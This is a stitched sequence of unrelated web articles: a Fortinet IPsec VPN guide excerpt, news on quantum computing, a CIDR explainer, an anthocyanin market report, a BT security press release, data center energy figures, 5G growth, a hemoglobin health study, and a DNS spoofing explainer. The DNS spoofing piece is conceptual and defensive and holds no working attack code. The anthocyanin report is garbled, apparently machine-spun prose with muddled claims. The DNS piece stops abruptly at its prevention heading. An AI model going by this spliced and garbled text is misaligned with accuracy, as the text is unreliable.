To configure default Phase 2 settings on a FortiGate unit, you need only select the name of the corresponding Phase 1 configuration. In FortiClient, no action is required to enable default Phase 2 settings. For more detailed information about Phase 2 settings, see Phase 2 parameters on page 1642.
The establishment of a Security Association (SA) is the successful outcome of Phase 1 negotiations. Each peer maintains a database of information about VPN connections. The information in each SA can include cryptographic algorithms and keys, keylife, and the current packet sequence number. This information is kept synchronized as the VPN operates. Each SA has a Security Parameter Index (SPI) that is provided to the remote peer at the time the SA is established. Subsequent IPsec packets from the peer always reference the relevant SPI. It is possible for peers to have multiple VPNs active simultaneously, and correspondingly multiple SPIs.
IKE and IPsec packet processing
Internet Key Exchange (IKE) is the protocol used to set up SAs in IPsec negotiation. As described in Phase 1 parameters on page 1624, you can optionally choose IKEv2 over IKEv1 if you configure a route-based IPsec VPN. IKEv2 simplifies the negotiation process, in that it:
- Provides no choice of Aggressive or Main mode in Phase 1.
- Does not support Peer Options or Local ID.
- Does not allow Extended Authentication (XAUTH).
- Allows you to select only one Diffie-Hellman Group.
- Uses less bandwidth.
The following sections identify how IKE versions 1 and 2 operate and differentiate.
A peer, identifed in the IPsec policy configuration, begins the IKE negotiation process. This IKE Security Association (SA) agreement is known as Phase 1. The Phase 1 parameters identify the remote peer or clients and supports authentication through preshared keys or digital certificates. You can increase access security further using peer identifiers, certificate distinguished names, group names, or the FortiGate extended authentication (XAuth) option for authentication purposes. Basically, Phase 1 authenticates a remote peer and sets up a secure communication channel for establishing Phase 2, which negotiates the IPsec SA.
IKE Phase 1 can occur in either Main mode or Aggressive mode. For more information, see Phase 1 parameters on page 1624.
IKE Phase 1 is successful only when the following are true:
- Each peer negotiates a matching IKE SA policy.
- Each peer is authenticated and their identities protected.
- The Diffie-Hellman exchange is authenticated (the pre-shared secret keys match). For more information on Phase 1, see Phase 1 parameters on page 1624.
Phase 2 parameters define the algorithms that the FortiGate unit can use to encrypt and transfer data for the remainder of the session in an IPsec SA. The basic Phase 2 settings associate IPsec Phase 2 parameters with a Phase 1 configuration.
In Phase 2, the VPN peer or client and the FortiGate unit exchange keys again to establish a more secure communication channel. The Phase 2 Proposal parameters select the encryption and authentication algorithms needed to generate keys for protecting the implementation details of the SA. The keys are generated automatically using a Diffie-Hellman algorithm.
In Phase 2, Quick mode selectors determine which IP addresses can perform IKE negotiations to establish a tunnel. By only allowing authorized IP addresses access to the VPN tunnel, the network is more secure. For more information, see Phase 2 parameters on page 1642.
IKE Phase 2 is successful only when the following are true:
- The IPsec SA is established and protected by the IKE SA.
- The IPsec SA is configured to renegotiate after set durations (see Phase 2 parameters on page 1642 and Phase 2 parameters on page 1642).
- Optional: Replay Detection is enabled. Replay attacks occur when an unauthorized party intercepts a series of IPsec packets and replays them back into the tunnel. See Phase 2 parameters on page 1642.
- Optional: Perfect Forward Secrecy (PFS) is enabled. PFS improves security by forcing a new Diffie-Hellman exchange whenever keylife expires. See Phase 2 parameters on page 1642.
For more information on Phase 2, see Phase 2 parameters on page 1642.
With Phase 2 established, the IPsec tunnel is fully negotiated and traffic between the peers is allowed until the SA terminates (for any number of reasons; time-out, interruption, disconnection, etc).
Unlike Phase 1 of IKEv1, IKEv2 does not provide options for Aggressive or Main mode. Furthermore, Phase 1 of IKEv2 begins immediately with an IKE SA initiation, consisting of only two packets (containing all the information typically contained in four packets for IKEv1), securing the channel such that all following transactions are encrypted (see Phase 1 parameters on page 1624).
The encrypted transactions contain the IKE authentication, since remote peers have yet to be authenticated. This stage of IKE authentication in IKEv2 can loosely be called Phase 1.5.
As part of this phase, IKE authentication must occur. IKE authentication consists of the following:
- The authentication payloads and Internet Security Association and Key Management Protocol (ISAKMP) identifier.
- The authentication method (RSA, PSK, ECDSA, or EAP).
- The IPsec SA parameters.
Due to the number of authentication methods potentially used, and SAs established, the overall IKEv2 negotiation can range from 4 packets (no EAP exchange at all) to many more.
At this point, both peers have a security association complete and ready to encrypt traffic.
In IKEv1, Phase 2 uses Quick mode to negotiate an IPsec SA between peers. In IKEv2, since the IPsec SA is already established, Phase 2 is essentially only used to negotiate “child” SAs, or to re-key an IPsec SA. That said, there are only two packets for each exchange of this type, similar to the exchange at the outset of Phase 1.5.
Support for IKEv2 session resumption described in RFC 5723
If a gateway loses connectivity to the network, clients can attempt to re-establish the lost session by presenting the ticket to the gateway. As a result, sessions can be resumed much faster, as DH exchange that is necessary to establish a brand new connection is skipped. This feature implements “ticket-by-value”, whereby all information necessary to restore the state of a particular IKE SA is stored in the ticket and sent to the client.
Having trouble configuring your Fortinet hardware or have some questions you need answered? Check Out The Fortinet Guru Youtube Channel! Want someone else to deal with it for you? Get some consulting from Fortinet GURU!
Don't Forget To visit the YouTube Channel for the latest Fortinet Training Videos and Question / Answer sessions!
- FortinetGuru YouTube Channel
- FortiSwitch Training Videos | <urn:uuid:d90f1eb8-2501-4445-95f7-d7c4f5bfd4f8> | CC-MAIN-2022-40 | https://www.fortinetguru.com/2016/10/ipsec-vpn-concepts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00319.warc.gz | en | 0.875819 | 4,916 | 3 | 3 |
Quantum Computers Could Help Tackle Climate Change Challenges
(TechHQ) In the fight against climate change, a plethora of new technologies will be required to not only transform conventional approaches that are contributing to world carbon emission but also birth a new generation of green technologies. This article contends that quantum computers hold the key in realizing green solutions that can accelerate the goal of carbon neutrality by 2050.
The World Economic Forum (WEF) stated by 2025, quantum computing “will have outgrown its infancy,” and we’ll see a fist generation of commercially available quantum-inspired devices to “tackle meaningful, real-world problems.”
Companies across industries are looking towards the future-forward tech to solve the challenges of today and tomorrow. Though quantum computers are not readily available or commercialized yet, it’s just a matter of time before an explosion of use cases are seen.
Aerospace giant Airbus has been advocating for the aviation industry to explore new fields such as AI and quantum computers to create a climate-neutral industry.
German automaker Volkswagen has been testing a quantum-inspired navigation app that will be baked into its vehicles within the next few years to prevent road congestion by ensuring the most efficient route is in use. | <urn:uuid:b9e17a2d-3d67-4fb1-aca8-366ac2621e66> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-computers-could-help-tackle-climate-change-challenges/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00319.warc.gz | en | 0.928716 | 254 | 3.234375 | 3 |
If you are in the business of IPv4 and IP Addresses you’ve probably heard or seen the term CIDR, but do you know what it is? Knowing what CIDR stands for is helpful, but it’s even better to explore how CIDR works and understand the concept. Below are some frequently asked questions that will increase your understanding of the term and why it is important.
What does CIDR Stand for?
CIDR Stands for “Classless Inter-Domain Routing”. It replaced the original “classful” IPv4 address routing and allocation policies. CIDR is an IP Addressing scheme that improves the allocation of IP addresses.
Why is CIDR Important?
In the beginning, IPv4 blocks were designated in classes: A, B, and C. Class A had 16 million addresses, Class B had 65 thousand, and Class C had 256 addresses. This lack of granularity led to inefficient allocations and usage of increasingly scarce IPv4 addresses.
CIDR replaced classes with a nomenclature allowing for variable sized blocks, using an appellation called a subnet mask, designated as the number of masked bits behind a slash. Since the total number of bits in an IPv4 address is 32 bits, the size of the subnet mask can vary from a /0 (the whole internet) to a /32 (a single IPv4 address). This allowed for allocations and routing entries to describe any size of IPv4 block without the classful limit of only three sizes.
The original Class C, the smallest class containing just 256 addresses, is written as a /24 in CIDR notation. That means out of the total 32 bits of address space, 24 bits are masked, leaving only 8 bits of address space in the block. In binary terms, 8 bits equals 256 possible numbers. Likewise, a Class A network is now written as a /8, leaving 24 bits of address space in the block. Again, in binary terms 24 bits yields 16 million addresses.
Benefits of CIDR Notations
The benefits are clear when considering an entity with a need for 500 addresses. In the past, this would be larger than a Class C, and would require allocation of a Class B network containing 65,536 addresses. With CIDR, the allocation can be a /23, twice as large as a /24 and providing 512 addresses. So instead of wasting an entire Class B (a /16), less than 1% of the Class B is allocated, leaving the remainder available.
CIDR’s introduction in the late 1990s was the largest reason for the extension of viable life for IPv4, which was anticipated to be exhausted in just a few years under the classful allocation regime. These days, the block sizes associated with particular subnet mask sizes are usually memorized by brokers with years of experience. | <urn:uuid:96fcccfb-5c24-41cb-9bb3-56f5b09b68b6> | CC-MAIN-2022-40 | https://iptrading.com/our-thoughts/what-is-cidr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00319.warc.gz | en | 0.943297 | 699 | 3.765625 | 4 |
Anthocyanin is water-solvent phytochemicals with a regular red to blue shading. It is a flavorless and scentless flavonoid which is commonly found in leafy foods, for example, berries, cabbage, purple grapes and beets among others. Anthocyanin additionally goes about as a cancer prevention agent, hostile to unfavorably susceptible, calming, against microbial, and microcirculation improvement. Anthocyanin has extremely high use in the sustenance and drink industry as a colorant. Aside from its practical properties it additionally has a wide scope of medical advantages give it inclination as an urgent fixing in most nourishment items. Their different medical advantages incorporate being an enemy of unfavorably susceptible, hostile to microbial, calming and against oxidant. Worldwide demand for anthocyanin is driven by developing demand for shading added substances in the nourishment and drinks industry. Applications of anthocyanin in the nourishment and drink industry are as a sustenance colorant. The expanding demand for solid sustenance items is required to help the demand for anthocyanin sooner rather than later. It is normal that in time it will be the favored sort of colorant because of its expansive number of medical advantages when contrasted with different colorants.
The global anthocyanin market size to reach nearly USD 747.34 Million by 2026. The global optical satellite communication market is likely to expand at a CAGR of more than 4.8% from 2019 to 2026.
The worldwide market for anthocyanin has seen a critical rise in a previous couple of years attributable to the rising mindfulness with respect to the medical advantages of anthocyanin and their rising arrangement of applications over various enterprises. The reinforcing monetary states of creating nations, for example, India, China, Brazil, and Argentina in the previous years and the resultant ascent in acquiring influence of buyers have helped increment the utilization of anthocyanin-rich nourishments over these nations.
The utilization of anthocyanin-rich items is additionally ascribed to the changing way of life of the purchasers, which, thus, is fueled by the rising mindfulness about wellbeing and health among shoppers. As indicated by an examination distributed, ordinary admission of anthocyanin helps in lessening the danger of coronary illness, respiratory clutters and as most different cell reinforcement help in anticipating malignant growth and battle against oxidative harm among different advantages. Most purchasers searching for nourishment items that served their need to keep up a solid way of life and most items come up short on this property of being sound. The consideration of anthocyanin as a colorant will help the dimension of medical advantages for an item give it a bigger shopper base.
Expanding application scope in pharmaceuticals and claim to fame drugs is evaluated to reinforce anthocyanin market development over the estimated time frame. Unrivaled properties, for example, microcirculation improvement, hostile to microbial, calming and against hypersensitive combined with extra medical advantages are attempted to expand market development in this section over the figure time frame. Anthocyanin has been discovered powerful in ailments, for example, malignant growth, diabetes, psychological decrease, and a few cardiovascular ailments. Quick urbanization and expanding disposable income are different elements that are relied upon to move anthocyanin market development especially in rising economies, for example, China, India, and Brazil over the gauge time frame. Furthermore, changing consumption pattern combined with an expansion in the solid sustenance demand is one more factor expected to fuel the anthocyanin demand throughout the following seven years. Moving customer preferences towards solid and appealing bundled sustenance and drink items are foreseen to impel natural product concentrates development. A few government guidelines with respect to anthocyanin use are foreseen to contrarily influence market development over the not so distant.
Among end use, the food and beverages industry is probably going to lead the market in 2018. The pattern is probably going to stay unaltered over the span of the figure time frame. The food and beverages industry segment contributed to the greatest lump of incomes to the worldwide market in 2018. The food and beverages industry is projected to hold market strength all through the figure time frame. The arrangement of applications of Anthocyanin in an assortment of food and refreshment items is tremendous when contrasted with applications in other key end-user businesses.
Nevertheless, the restorative impacts of anthocyanin, inferable from their enemy of oxidative, neuroprotective, and against malignant growth nature, have made them appropriate for application in pharmaceutical items also. In this way, the demand for anthocyanin in the social insurance part has seen an enormous ascent in a previous couple of years, making the pharmaceutical business one of the key supporters of the worldwide anthocyanin market's development. Along these lines, the pharmaceutical portion is the viewed as the most alluring application fragment of the worldwide anthocyanin market throughout the following couple of years, expected to enlist the most encouraging 4.6% CAGR from 2018 through 2026.
Europe market is one of the key regional markets for Anthocyanin as far as commitment of income to the worldwide market, esteemed at highest revenue share and is estimated to hold market strength all through the gauge time frame. The U.K. is the leader for the provincial market. However, the utilization of anthocyanin in the district has endured a decay post the requirement of stringent tenets and guidelines in regards to the use of engineered food hues in different items.
In Europe, each regular food shading that has been affirmed for use is assessed by the Scientific Committee on Food (SCF), which comprises of a gathering of logical specialists from each part state delegated by the European Commission. This is required to result in a slight decrease in the locale's offer in the worldwide anthocyanin market by 2026, with the Asia Pacific rising as the following high-potential customer over the period somewhere in the range of 2019 and 2026. The Asia Pacific anthocyanin market is required to display a very encouraging and the significant CAGR over the said period.
North America market is currently leading the anthocyanin market, with the U.S. and Canada being the significant supporters of the huge demand for the equivalent. Besides, a few organizations working in the field of anthocyanin have a solid nearness in the area also. Also, attributable to the overwhelming nearness of the food and drink, individual consideration, and pharmaceutical enterprises in the U.S., customers have wide access to an assortment of anthocyanin imbued items. The demand for anthocyanin in North America is required to observe a noteworthy flood amid the estimated time frame.
Market Segmentation by Product:
Market Segmentation by End Use:
Market Segmentation by Source:
Market Segmentation by Region:
The market research study on “Anthocyanin Market (By Product: Cyanidin, Delphinidin, Malvidin, Pelargonidin, Peonidin, Petunidin; By End Use: Animal Feed, Cosmetics & Personal Care, Food & Beverage Industry, Nutraceutical Industry, Pharmaceutical Industry; By Source: Cereals, Flowers, Fruits, Legumes, Vegetables) - Global Industry Analysis, Market Size, Opportunities and Forecast, 2019 - 2026” offers detailed insights on global anthocyaninmarket segments with market dynamics and their impact. The report provides insights on global anthocyaninmarket by product, enduse, source, and major geographic regions.
Innovative item development satisfying customer needs is relied upon to be a key strategy adopted by these companies over the forecast time frame. Innovative advertisement and marketing strategies are required to increase market penetration in specialty segments throughout the following seven years. Social media platforms are relied upon to be utilized on a large scale to increase customer base and market share. Partnerships, M&A, joint ventures, and expansion of existing facilities are relied upon to be some different strategies adopted by major market participants to increase their share in the upcoming future.
Sensient Technologies Corporation has acquired the natural color business of a Peru-based natural food and ingredient comapnay—GlobeNatural—in the year 2018. This strategic acquisition was focused at product portfolio enhancement and improvement of manufacturing capabilities of the parent company
CHR Hansen Holding A/S has focused on growing its natural color business located in North America in the year 2018 by acquiring a manufacturing facility situated in Wisconsin. This expansion has enabled to serve the growing needs of customers through their distinguishable and exclusive offerings
Archer Daniels Midland Company (ADM) has announced a proposed acquisition of an international manufacturer of animal nutrition products—Neovia, in the year 2018. In order to offer addition to the company’s integrated animal nutrition portfolio
Major companies contributing the global anthocyanin market are Archer Daniels Midlands Co, CHR Hansen A/S, D.D. Williamson and Co. Inc., FMC Corporation, GNT Group, Kalsec Inc., Naturex S.A., Sensient Technologies Corp, Symrise A.G., and Synthite Industries | <urn:uuid:c1b9be2c-64d5-4ade-ad68-52358b73fb9a> | CC-MAIN-2022-40 | https://www.acumenresearchandconsulting.com/anthocyanin-market | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00519.warc.gz | en | 0.927874 | 1,913 | 3 | 3 |
BT today announced that it has developed an epidemiology-based cybersecurity prototype, “Inflame”, which uses deep reinforcement learning to enable enterprises to automatically detect and respond to cyber-attacks before they compromise a network. Using the spread of viruses in human populations as a model to inform its AI, Inflame is a key component in BT’s recently-announced Eagle-i platform.
Epidemiological modelling is typically associated with the spread of viruses and diseases amongst human populations, and has been critical in analysing and managing the spread of COVID-19 over the past 20 months. Using the same principals of epidemiology, BT’s Inflame solution has been developed to understand how computer viruses and cyber-attacks spread across enterprise networks, and how to prevent them from happening.
To develop the technology, security researchers at the BT Labs in Suffolk, UK, built models of enterprise networks which were used to test numerous scenarios based on differing R rates of cyber-infection. This testing enabled the research team to understand how these threats can penetrate and compromise a network, and develop optimal automated responses needed to contain and prevent the spread of viruses across them.
The deep reinforcement training and learning undertaken in the development of Inflame means the solution can automatically model and respond to a detected threat within an enterprise network. These responses are also underpinned by ‘attack lifecycle’ modelling, which assesses real-time security alerts against established patterns to understand the current stage of an ongoing cyber-attack. This insight is used to predict the next stages of an attack and rapidly identify the best response to prevent it from progressing any further.
BT recently announced its transformational cyber defence platform ‘Eagle-i', which uses AI to provide real-time detection of issues and intelligent automated responses. The platform has been designed to self-learn from the intelligence provided by each intervention, so that it constantly improves its threat knowledge and dynamically refines how it protects other users going forward.
“We know the risk of cyber-attack is higher than ever and has intensified significantly during the pandemic. Enterprises now need to look to new cybersecurity solutions that can understand the risk and consequence of an attack, and quickly respond before it’s too late,” said Howard Watson, Chief Technology Officer, BT. “Epidemiological testing has played a vital role in curbing the spread of infection during the pandemic, and Inflame uses the same principles to understand how current and future digital viruses spread through networks. Inflame will play a key role in how BT’s Eagle-i platform automatically predicts and identifies cyber-attacks before they impact, protecting customers’ operations and reputation.”
In epidemiology, the R number is used to quantify the spread of infectious diseases in a population
Mike Witts, Head of Technology Communications, BT | <urn:uuid:83acc845-206d-4ffd-bd8b-3c99983878f3> | CC-MAIN-2022-40 | https://www.darkreading.com/attacks-breaches/bt-to-deploy-epidemiological-ai-based-on-the-spread-of-viruses-in-humans-to-combat-cyberattacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00519.warc.gz | en | 0.941201 | 599 | 2.546875 | 3 |
The upward trend in the growth of data center energy usage has slowed, according to a new study from Stanford professor Jonathan Koomey. The report found that data center power consumption increased by 36 percent from 2005 to 2010, a much smaller increase than the 100 percent gain projected in an influential study Koomey prepared in 2007.
"The rapid rates of growth in data center electricity use that prevailed from 2000 to 2005 slowed significantly from 2005 to 2010, yielding total electricity use by data centers in 2010 of about 1.3% of all electricity use for the world, and 2% of all electricity use for the US," Koomey writes. The report, "Growth in Data Center Power Use 2005 to 2010,” was prepared for the New York Times, which summarizes the findings. The full report is available via Koomey's web site.
The moderating pace of data center energy use is "driven mainly by a lower server installed base than was earlier predicted rather than the efficiency improvements anticipated in the report to Congress," writes Koomey, whose 2007 report to Congress and the Environmental Protection Agency has framed most subsequent discussions of data center energy usage.
Economic Slowdown and Virtualization Cited
Koomey says companies have been buying fewer servers than anticipated due to the economic slowdown and the benefits of virtualization, which allows users to make better use of their server capacity. The study downplays the potential impact of an industry-wide effort to develop metrics and share best practices on energy efficiency, but indicated that these efforts could begin to have a larger impact in the near future, as more computing workloads shift to cloud computing platforms hosted in cutting-edge facilities.
In compiling the data, Koomey used estimates of installed servers from the research firm IDC. He assumed a data center Power Usage Effectiveness (PUE) rating of between 1.83 and 1.92, based on estimates of the average PUE reported in recent samplings by the EPA Energy Star Program and the Uptime Institute. While some cloud computing data centers have PUEs in the 1.1 to 1.3 range, Koomey noted that less efficient in-house corporate data centers account for the largest number of servers. "That (PUE) assumption will need to be revisited as cloud computing becomes more widely used," he wrote.
Energy Usage Slows During Building Boom
The New York Times has been investigating data center energy use since early 2010, with a particular focus on Google's data centers. "Data centers’ unquenchable thirst for electricity has been slaked by the global recession and by a combination of new power-saving technologies," writes The Times John Markoff. "The decline in use is surprising because data centers, buildings that house racks and racks of computers, have become so central to modern life," "The slowdown in the rate of growth of electricity use is particularly significant because it comes in the midst of the biggest build-out of new data center capacity in the history of the industry."
The five-year period reviewed in the Koomey tracks a time of dynamic growth for the data center industry, in which Google, Yahoo, Microsoft, Facebook and Apple all built enormous cloud data centers, while service providers filled space at wholesale data centers built by Digital Realty Trust and DuPont Fabros Technology. | <urn:uuid:9330b84e-c223-490a-97b4-2bfda8f46fec> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/archives/2011/08/01/report-data-center-energy-use-is-moderating/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00519.warc.gz | en | 0.944896 | 677 | 2.5625 | 3 |
5G can be significantly faster than 4G, delivering up to 20 Gigabits-per-second (Gbps) peak data rates and 100+ Megabits-per-second (Mbps) average data rates. 5G has more capacity than 4G. 5G is designed to support a 100x increase in traffic capacity and network efficiency. 5G has lower latency than 4G.
1G, 2G, 3G, and 4G all led to 5G, which is designed to provide more connectivity than was ever available before. 5G is a unified, more capable air interface. It has been designed with an extended capacity to enable next-generation user experiences, empower new deployment models, and deliver new services. With high speeds, superior reliability, and negligible latency, 5G will expand the mobile ecosystem into new realms. 5G will impact every industry, making safer transportation, remote healthcare, precision agriculture, digitized logistics — and more — a reality.
” 5G is growing faster than anticipated and has reached subscription levels no previous generation has achieved “
ABI Research calculates the number of years a new generation takes until it reaches 100 million and 1 billion subscriptions, which can act as a metric to compare different generations along the same axis.
As can be seen from the figure, 5G is growing faster than previous generations and has reached 100 a million subscriptions in less than 2 years after the standard was published, when the closest generation was 4G, which reached the same mark 5 years after the standard. Moreover, 5G is expected to reach 1 billion subscriptions in 2023, 5 years after it was standardized, while 4G reached the same target after 7 years.
Reasons for the Success of 5G in the Market
- Supply chain maturity: The cellular supply chain has reached high levels of efficiency with tight collaboration between chipset Original Equipment manufacturers (OEMs) and the handset and infrastructure manufacturers, as well as all component providers.
- Device availability: 5G devices were developed in a rapid manner and the first smartphones were ready less than 1 the year before the 3GPP standard was published. Mid-tier smartphones followed a year after, making the 5G business case a success.
- Infrastructure vendor: capabilities: Infrastructure vendors created high-performance, high-efficiency equipment on a large scale, also less than 1 year before the standard was published. mMIMO antennas that enabled beamforming are an engineering leap ahead.
- Market demand: Long Term Evolution (LTE) and LTE-Advanced created the foundation for 5G and the market demand for high-quality mobile broadband. Today, 5G provides a significant capacity boost compared to previous generations.
All these reasons and numbers are good, however, I have one concern to be considered, the main point here is that 4G is likely to remain the dominant mobile technology for now. As 4G coverage is in excess of 80% in most countries and is forecast to reach over 90% by 2025. | <urn:uuid:d85d3f77-2f63-4d84-8ee7-d5f4773ef958> | CC-MAIN-2022-40 | https://moniem-tech.com/2022/08/23/why-is-5g-growth-faster-than-the-previous-generations/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00519.warc.gz | en | 0.960408 | 609 | 2.578125 | 3 |
However, the latest research evidence appears to point in the opposite direction: high hemoglobin levels are linked to metabolic morbidity and mortality, while low hemoglobin levels are an indication of better metabolic health.
Earlier this year, a research team led by Professor Peppi Karppinen from the University of Oulu, Finland, published a study which showed low hemoglobin levels to be associated with a lower body mass index and better metabolic health.
The study subjects were members of the OPERA cohort study (Oulu Project Elucidating Risk of Atherosclerosis). Nearly a thousand middle-aged individuals were included in the study, and their health was monitored until old age.
During 20 years of follow-up, higher hemoglobin levels were linked to common metabolic disorders, such as diabetes and hepatic steatosis, and also associated with higher cardiovascular morbidity and total mortality.
“In our previous study, we demonstrated that low hemoglobin levels induce a hypoxic response in the body. The activation of this response leads to changes in energy metabolism and the inflammatory response which provide individuals with lower hemoglobin level protection against metabolic disturbances.
The current results regarding the connection between higher hemoglobin levels and metabolic disorders and mortality are in line with our previous findings, supporting the idea that the body’s hypoxic response plays a key role in the regulation of energy metabolism in humans,” states principal investigator MD Joona Tapio.
Blood hemoglobin is one of the least expensive and most commonly tested laboratory parameters in the primary health care setting. According to Tapio, hemoglobin measurements could potentially be helpful in the early diagnosis of metabolic disorders.
The results could also help develop drug therapies for metabolic disorders. The hypoxic response is regulated by the HIF molecule which tries to ensure optimal oxygen uptake and energy metabolism in tissues under conditions of reduced oxygen availability.
According to the researchers, drugs that act as inhibitors of HIF enzymes, which regulate a hypoxic response, could potentially be used as anti-obesity and metabolism drugs in humans. These medicinal agents are currently being used in the treatment of anemia caused by kidney disease.
Metabolic syndrome is a cluster of concurrent disorders involving high blood glucose, adverse blood lipids and high blood pressure. Over the last few decades, this syndrome has become a global epidemic, and the conditions associated with it, such as diabetes, are major public health problems in Finland.
Over a billion people around the world have metabolic syndrome, and it has been estimated that about one out of four adult Finns suffers from it.
Metabolic syndrome (MetS) is a global epidemic which coincides with the increasing prevalence of obesity. MetS is defined as a group of metabolic disorders which increases the risk for type 2 diabetes (T2DM), cardiovascular diseases (CVD) and total mortality. The major components of MetS are visceral obesity, dyslipidemia and hypertension1,2.
Non-alcoholic fatty liver disease (NAFLD) is also considered a co-morbidity of MetS3. The average prevalence of MetS was 31% in 20174. Individuals with MetS have a 46% increased risk of mortality compared to individuals without the syndrome5.
Hb is the main carrier of oxygen in the cardiovascular system. Hb levels are regulated genetically and environmentally and they vary by sex, race, age and living altitude6,7. However, individual Hb levels during adult life are relatively stable although Hb levels successively decrease with ageing in men and postmenopausal women6.
In general, high-end Hb levels within the normal range are considered beneficial for health6. However, Hb levels can be elevated by factors such as smoking, a well-known risk factor for metabolic diseases and higher Hb levels are also observed in obesity, which likewise is a well-known risk factor for cardiometabolic diseases1,2.
Previous studies with selected cohorts, cross-sectional setting and often including only one sex have shown associations of higher Hb levels with individual components of MetS including insulin resistance, NAFLD, dyslipidemia and hypertension8,9,10,11,12,13,14,15.
However, higher Hb levels have also been associated with lower glycated hemoglobin (HbA1c) levels16. Regarding obesity-related peptide hormones, Hb levels have previously been both positively and negatively associated with serum leptin levels and negatively associated with serum adiponectin levels17,18,19.
Studies have also reported lower Hb levels (especially anemic) and very high Hb levels as predictors of total and CVD-related mortality20,21,22,23. The underlying mechanisms of the reported associations between higher Hb levels and metabolic markers have been poorly understood.
Hyperviscosity or changes in plasma volume10,11,12,22,24, endothelial cell dysfunction 10 or higher iron/ferritin levels 13,15 have been suggested as mediators of these associations. However, we have recently shown that lower Hb levels associate with an overall healthier metabolic profile in males and females in two middle-aged Finnish sea level birth cohorts studied in a longitudinal setting until age of 46 years, and that these alterations are mediated by hypoxia25. All in all, the role of Hb levels as a risk factor of MetS and its comorbidities requires further studies.
The aims of this study were
(1) to assess cross-sectionally the associations between Hb levels and some 20 key metabolic parameters, obesity-related peptides and ambulatory blood pressure (ABP) measurements in middle-age (average age 51 years) and senescence (average age 72 years),
(2) evaluate in a cross-sectional design Hb levels as a risk factor for fatty liver disease, and in a longitudinal design evaluate the role of Hb levels
(3) in prediction of the development of impaired glucose metabolism and
(4) as a risk factor for CVD events and -related mortality and total mortality. Long-term studies considering the risk profile of the highly prevalent metabolic disorders are needed and this study offers a follow-up period of ~ 20 years, to our knowledge the longest in the literature. Increased information about the risk profile of MetS would eventually lead to decreased morbidity and mortality through improved primary prevention.
reference link :https://www.nature.com/articles/s41598-021-99217-9
More information: Joona Tapio et al, Higher hemoglobin levels are an independent risk factor for adverse metabolism and higher mortality in a 20-year follow-up, Scientific Reports (2021). DOI: 10.1038/s41598-021-99217-9 | <urn:uuid:6c8ec103-0e40-4b1b-89a3-6455bbd090a4> | CC-MAIN-2022-40 | https://debuglies.com/2021/11/07/a-finnish-study-showed-that-low-hemoglobin-levels-are-associated-with-a-lower-body-mass-index-and-better-metabolic-health/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00519.warc.gz | en | 0.946935 | 1,391 | 3.25 | 3 |
DNS Spoofing is a type of Cyber Security attack where a user accidentally navigates to an attacker’s website which is disguised to look like a real one, with the intention of stealing credentials of the users or diverting network traffic.
Domain Name Server (DNS) locates the nodes on the network and communicates with them by resolving the alphabetical domain names like www.example.com into respective IP addresses. Whereas, spoofing attacks are the cyber attacks that can go undetected for a huge epoch of time and can cause serious security issues to their Victim system. These attacks trick victims into divulging personal information through email, text messages, caller ID, even GPS receivers.
A DNS server is used for the purpose of resolving a domain name (such as abcd.com) into the associated IP address that is mapped to it. After the DNS server finds the appropriate IP address, data transfer is initiated between the client and website’s server. DNS spoofing is performed by replacing the IP addresses stored in the DNS server with the IP addresses controlled by the attacker. Once the process by the attacker is completed on the victim’s machine, whenever the victim tries to navigate to a specific website, they are redirected to the false website created by the attacker on the spoofed DNS server.
Methods of attacking DNS spoofing attacks
DNS spoofing categorizes the attacks on the basis of the end goal targeted by the attacker. This type of cyber attack refers to the broad category of attacks that spoof DNS records. There are multiple ways to perform DNS spoofing, such as
- Compromising a DNS server
- DNS cache poisoning attack
- Man-in-the-middle attack (if you can get access to the network)
- Sequence number guessing (maybe making many requests)
- False base station creation and fabricate the DNS server on network
Two famous methods of performing DNS spoofing are detailed as below
DNS Cache Poisoning – In DNS cache poisoning, the local DNS server is replaced with a compromised DNS server, which contains customized entries of genuine website names with the IP addresses replaced by the attacker. Thus, when the victim sends a request to the local DNS server for IP resolution, it communicates with the compromised DNS server, resulting in the user being redirected to a counterfeit website planted by the attacker. This attack is also simplified for the attacker, when end users use the same DNS cache, and an attacker manages to inject a forged DNS entry into that cache. For example, ISPs run a caching DNS server and route their path for customers to the DNS server. If an attacker gets through the security to update the DNS server cache with an incorrect record, then the attacker manages to successfully spoof DNS records and access all the end users who rely upon that cache.
DNS ID Spoofing- In DNS ID spoofing, the victim sends the resolve request to the server, where the packet ID and IP information generated for the resolve request is duplicated with forged information inside it. As the response ID matches the request ID, the Victim’s machine accepts the response containing the information that is not expected.
Attacks of DNS spoofing
DNS Spoofing has never been an ‘easy to detect’ cyber crime. On January 9, 2019, security vendor FireEye released its report, “Global DNS Hijacking Campaign: DNS Record Manipulation at Scale,” which went into far greater technical detail about the “how” of the espionage campaign, but contained few additional details about its victims. Also, the FireEye reports that the U.S. Department of Homeland Security issued a rare emergency directive ordering all U.S. federal civilian agencies to secure the login credentials for their Internet domain records
Also the Kaminsky attack against a vulnerable server brought awareness about the seriousness of such issues. The issue as described in CVE page is
“The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka DNS Insufficient Socket Entropy Vulnerability or the Kaminsky bug.”
Preventive measures for DNS Spoofing
